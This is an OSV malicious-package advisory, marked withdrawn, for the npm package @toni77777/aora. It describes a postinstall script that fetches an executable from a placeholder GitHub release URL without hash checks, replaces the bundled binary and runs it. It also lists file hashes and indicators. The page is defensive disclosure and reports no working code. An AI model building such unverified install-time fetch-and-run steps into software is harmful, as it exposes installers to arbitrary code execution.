MAL-2026-4458
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@toni77777/aora/MAL-2026-4458.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4458
- Withdrawn
- 2026-05-26T21:14:22Z
- Published
- 2026-05-21T07:14:49Z
- Modified
- 2026-05-27T00:31:51.701517987Z
- Summary
- Malicious code in @toni77777/aora (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2)
On
npm install, scripts/postinstall.js fetches a platform-specific executable fromhttps://github.com/yourusername/aora/releases/download/v0.1.0/<asset>, writes it tobin/aora, chmods it 0755, and the package'sbinentry then spawns it. The download URL points at GitHub accountyourusername— a placeholder that does not match the package publisher (@toni77777). No hash or signature verification is performed on the fetched bytes. Anyone who registers or controls theyourusernameGitHub account can upload a release at this path and have arbitrary native code executed on every installer's machine. The script also unconditionally overwrites a ~15 MB native binary shipped in the tarball atbin/aora, so even the locally auditable bytes are replaced at install time. The fetch is not pinned by hash, the publisher does not match the host, and the resulting binary is executed — the canonical install-time dropper shape. - Database specific
{ "malicious-packages-origins": [ { "modified_time": "2026-05-21T07:14:50Z", "versions": [ "0.1.0" ], "sha256": "32fc2b8f288f10a0be2b2d22a064fb67108338b523f2c2061feef6c44ce5435a", "id": "IN-MAL-2026-003769", "source": "amazon-inspector", "import_time": "2026-05-26T05:51:16.776469633Z" }, { "import_time": "2026-05-26T05:51:16.659004838Z", "versions": [ "0.1.0" ], "sha256": "8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2", "id": "IN-MAL-2026-003768", "source": "amazon-inspector", "modified_time": "2026-05-21T07:14:49Z" }, { "import_time": "2026-05-26T05:51:16.875345347Z", "versions": [ "0.1.1" ], "sha256": "f90e1cdb9d4008d1291017a4c52bd33b0d241d4a92e9e009407d6e9600ed35d1", "id": "IN-MAL-2026-003770", "source": "amazon-inspector", "modified_time": "2026-05-21T07:23:41Z" }, { "modified_time": "2026-05-21T07:23:41Z", "versions": [ "0.1.1" ], "sha256": "49d48f678b5f0189d8b6a5cbea0392ddf69d3adc1df4db9a3be69889ecafa87a", "id": "IN-MAL-2026-003771", "source": "amazon-inspector", "import_time": "2026-05-26T05:51:17.022889646Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / @toni77777/aora
Package
- Name
- @toni77777/aora
- View open source insights on deps.dev
- Purl
- pkg:npm/%40toni77777%2Faora
Database specific
indicators
{
"domains": [
"github.com"
],
"evidence_files": [
{
"sha256": "b14639354d2c0b681679c8c0e59c7b3afcc54ed1c02c06418745791bfe65274c",
"tlsh": "4d41419d09f30138077240c9da4a1d9bf8578612b34aeb5cf46c43497fdbe2584a26ef",
"path": "scripts/postinstall.js"
},
{
"sha256": "fe48894538a7da975c0ecd784124001d54376075e5afe1fceb3c341956358e24",
"tlsh": "baf65d03fab60addd5edcc31851c23377b34b54a432096e72ba49e212e42fa15f78796",
"path": "bin/aora"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-ShGd14rQs1iX1djS8EPLMNNWkyV1zc4uI6U5+aFS61xlVpjcTH0F1vz/8g3uduycuMOzhBei69wCGE9Qu/YpLg==",
"sha1": "7000f1f01462e0da8a44611253a1515d14e832df"
},
"filename": "aora-0.1.0.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@toni77777/aora/MAL-2026-4458.json"